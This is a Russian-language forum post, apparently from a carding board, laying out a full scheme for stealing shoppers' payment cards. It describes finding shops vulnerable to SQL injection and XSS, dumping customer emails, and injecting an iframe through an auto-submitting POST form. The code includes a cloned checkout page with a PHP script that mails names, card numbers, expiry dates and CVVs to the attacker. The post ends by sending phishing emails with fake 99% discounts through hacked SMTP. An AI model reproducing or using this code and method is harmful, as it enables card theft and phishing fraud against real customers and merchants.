Инструкция Иньекция в виртуальный шоп

  • Автор темы LeMMinG
  • Дата начала

L

LeMMinG

Гость
Первое: надо найти уязвимый магаз. Ето можно зделать вручную с помощью дорков(Google Dorks) или юзая тулзы такие как Webcruiser, SQLi poison, и т.д.
Чо нам надо - тык ето магаз с обоими SQLi уязвимостями и XSS уязвимостями.

Надо знать што большынство БД содержут СС инфу каторая зашыфрована в МД5, FPE, чо бы там ни было с етим работать НЕРЕАЛЬНО. Однако есть одна вещь с которой можно работать: ето текущий и бывшый клиент емайла.

Поетому вперёд, переписыватаь(составлять) всю таблицу инфы о клиенте. Если повезёт - можно добыть как минимум 10к адресов или даж больше.

Следущий шаг: работа с XSS уязвимостями. Наиболее распространённые уязвимости ето POST, поетому остановимся на них. Хотя можно попробывать поюзать также и FORM.
Юзаем нижевыставленный код што забацать redirect.html (назвать файл можна как угодно).
Ета страница хтмла грузанёт уязвимый сайт моментально, с одним исключением: нихуёвый елемент IFRAME поверх неё, конешно ето будит уже другая страница.

Итак, код:
Код:
<html>
<head>
<script language=javascript>
function submitPostLink()
:zin:{
document.postlink.submit();
}
</script>
</head>
<body onload="submitPostLink()">
<form action="http://www.XXXXXXXcom/TextSearch.asp" name=postlink method="post">
<input type="hidden" name="NAMEOFVULNERABLEFIELD" value="<iframe src=&quot;Ecommerce Web Site Hosting and Streaming from YourHost.com width=&quot;800&quot;height=&quot;2400&quot; style=&quot;z-index: 0; position: absolute; top: 0; left: 0; overflow-y: hidden;&quot; frameborder=0 align=center></iframe>">
</form>
</body>
</html>
Идём далее, на checkout страницу сайта с каторым робим, сохраняем страницу на хард себе, включая поддиректории, файлы в них и картинки, кароче всё.(firefox делает ето автоматом). Теперь нам надо войти в редактирование основново файло каторый мы сохранили.

Ищем "action=", и меняем изначальную страницу на третью страницу которую мы создадим, которая будит PHP mail form, каторое отошлёт наше мыло тому кто заполнит форму.
PHP код будит следущим:


Код:
<?php
$userinfo = "@com"; //your email here
$ip = getenv("REMOTE_ADDR");
$message .= "".$_POST['firstname']."\n";
$message .= "".$_POST['lastname']."\n";
$message .= "".$_POST['org_name']."\n";
$message .= "".$_POST['telephone']."\n";
$message .= "".$_POST['fax']."\n";
$message .= "".$_POST['email']."\n";
$message .= "---------------------------------------------\n";
$message .= "".$_POST['cctype']."\n";
$message .= "".$_POST['credcard']."\n";
$message .= "".$_POST['exp_mon']."\n";
$message .= "".$_POST['exp_year']."\n";
$message .= "".$_POST['cccvv']."\n";
$message .= "".$_POST['ccname']."\n";


$subject="SUBJECT - $ip";
$headers = "From: NAMEl<@.com>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($userinfo,$subject,$message,$headers);

ЕТот код можыт быть прикреплён к хтмл коду, што получаецца копией ихнево сайта но с некоторым текстовым сообщением типа
"sorry, this offer is no longer available"
Почему? Потому:
После тово как мы всё ето сбацали и заргузили на сервак, нам надо будит укоротить наш redirect.html.
После етова ета залупа рассылаеццца по всем мыльникам клиентов шопа с постом типа "Вы наш ценный клиент и вам мы готовы предоставить скидку в 99% на тото и тото(тут можно быть творческим). Ну типа: your newest products for only 99 cents! Make sure that on your checkout form, you list the item you choose, so they see it when they're checking out.
Для етова можно воспользовацца хакнутым смтп или сервисом


Етот сервис позволяет отправить до 5000 мыл. БЕСПЛАТНО. Нужно подтверждение акка по телефону, но для етова можно заюзатьь или для получения смс на виртуальный номер телефона.

Если отправить достаточное к-во мыл формальным клиентам, покупателям магаза, с сообщением типа за 99 центов продадим бутылку каково нить худильново средства - они на ето клюнут очинь хорошо.

 
Верх Низ